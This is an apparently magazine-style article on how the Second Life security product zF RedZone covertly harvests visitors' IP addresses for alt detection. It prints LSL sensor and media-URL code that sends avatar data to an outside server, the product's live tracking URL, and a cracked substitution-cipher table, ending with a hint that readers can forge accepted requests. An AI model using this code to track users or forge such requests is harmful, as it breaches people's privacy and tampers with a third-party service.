Hacking Alt Detection in Second Life

by Johnny Fusion =11811=

A new fad in resident-run security in the virtual world of Second Life is alt detection.

This article will focus on the most widely run alt-detecting security system: zF RedZone.

What is an Alt?

An alt is short for "alternate account."

The account you mostly use being known as your "main," you would roll an alt for various reasons.  Perhaps you are a professional such as an educator or a public relations officer that uses Second Life for work-related activities, and you wish to explore some other sides of virtual living such as BDSM role-play that would not be appropriate for your main account, or would be damaging to your career if associated with your real life identity.  Of course, there are more nefarious reasons for rolling an alt such as ban evasion.

It is for this second reason that people use products such as zF RedZone, but unfortunately those in the first category are affected as well.

How Does Alt Detection Work?

The short version is alt detectors harvest your IP address and associate it with any number of accounts you may use.

Usually an IP address is opaque to the average Second Life user.  So detecting an IP is a hack in itself.  Second Life connects to the outside world in a number of ways.  One of the common processes is to stream music to users.  So if you are in a virtual dance club, everyone there can all hear the same music stream.

Second Life allows the streaming of different kinds of data to the client.  Currently, the types of media that are allowed to be streamed to the client are audio, image, movie, and web content.  It's this last little one that is the door for landowners to your IP address.

Not only does Second Life allow media to be streamed to your client (and let's admit it, Second Life would be a more boring place if it didn't), but it allows that content to be played either automatically (this is set in preferences) or started via a script.  If an object in Second Life does something, it is a script doing it.  If it moves, talks, interacts, or does anything besides just sit there, it is scripted.  A script is basically a small computer program written in Linden Scripting Language (LSL), which defines an object's behavior.

There are two things that work in conjunction to detect your IP: a scripted sensor, and a command to start playing media.

A line of LSL to have a repeating sensor to detect avatars is simple enough:

// arc=PI is a sphere llSensorRepeat("", "", AGENT, 1.0, PI, 0.5);

This scans a sphere 95 meters in diameter from the object with a script containing this command every half second.

If an avatar is within the range of this sensor when it sweeps, the avatars, name, key (a unique identifier), position, and other data can be detected.  This information can then be passed on to a third-party website by initiating a media stream with a line similar to this in the sensor() event handler:

llParcelMediaCommandList([PARCEL_MEDIA_COMMAND_URL, "http://enter_your.url/here?variables=data_from_sensor", PARCEL_MEDIA_COMMAND_AGENT, llDetectedKey(0), PARCEL_MEDIA_COMMAND_PLAY]);

And just like that, an identifying connection from your computer to a third-party server has been made without any intervention or permission from you.

A Practical Example

zF RedZone is a product sold in Second Life to manage ban lists, protect your land, and various other features.  But we will just concentrate on alt detection.

Like I outlined above, zF RedZone detects your IP address by forcing a load of a media URL.

A typical zF RedZone URL looks like:

http://isellsl.ath.cx/rz2.php?e=pscan&n=hIU4Up%20SU2762&o=08997Zv7rbmCXrXzX9r9978rvxb6vZn09vP8&d=0n6vbP87rxCbzrZPb7r0xnXrzzzzzzzzzzzC&l=LeLutka/249/107/61&j=n8n0zc79rC8XZr97Z9rXmCzrz7XXx8Pnv9ZC&p=yes&g=0&age=2004-03-14 # With the URL broken up http://isellsl.ath.cx/rz2.php e=pscan n=hIU4Up%20SU2762 # Philip%20Linden o=08997Zv7rbmCXrXzX9r9978rvxb6vZn09vP8 d=0n6vbP87rxCbzrZPb7r0xnXrzzzzzzzzzzzC l=LeLutka/249/107/61 j=n8n0zc79rC8XZr97Z9rXmCzrz7XXx8Pnv9ZC p=yes g=0 age=2004-03-14

As you can see, data is being passed to a server at: isellsl.ath.cx/rz2.php

Some of this data is encrypted, but not very well.  As I found a packet with me being detected, I knew what certain variables might be.  With this I was able to make a crib and decrypt all of the information being passed on the URL.

o

The author of zF RedZone used a simple substitution cypher.  My crib is printed below:

Plain: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890- Cypher: 09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-amnCXZbvcxzr Cypher: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890- Plain: Z68WFVQPwONI12vpH-XEw7u9y0MT3KsJDChBAzRSgfurLqiUt4j5onmlkedcbaY

Doing a little investigation, I have found out the format of the information being passed as follows:

e = "method of input"  Always pscan when I encounter it in world.

n = "name"  Name of avatar being detected, encrypted using the substitution cypher.

o = "owner"  UUID of the owner of the parcel, encrypted using the substitution cypher.

d = "UUID"  Key of the one being detected, encrypted using the substitution cypher.

l = "location"  The region and coordinates of the avatar being detected, surprisingly in plaintext.

j = "sensor key"  UUID of the sensor, encrypted using the substitution cypher.

p = "payment"  Whether or not the avatar being detected has payment information on file with Linden Lab (values will be yes or no).

g = "griefer"  This is the one I am not sure of.  So far I read as a "0" - I suspect by the time this article is published, it may be a different value and I may find myself banned on zF RedZone protected parcels.

age = "age"  Creation or "rez" date of the avatar being detected in the format of YYYY-MM-DD.

Now you have the domain and the means to construct a URL that will be accepted by the system.

Avatar names, keys, and rez dates are publicly available.  What to do with this information, I leave as an exercise for the reader.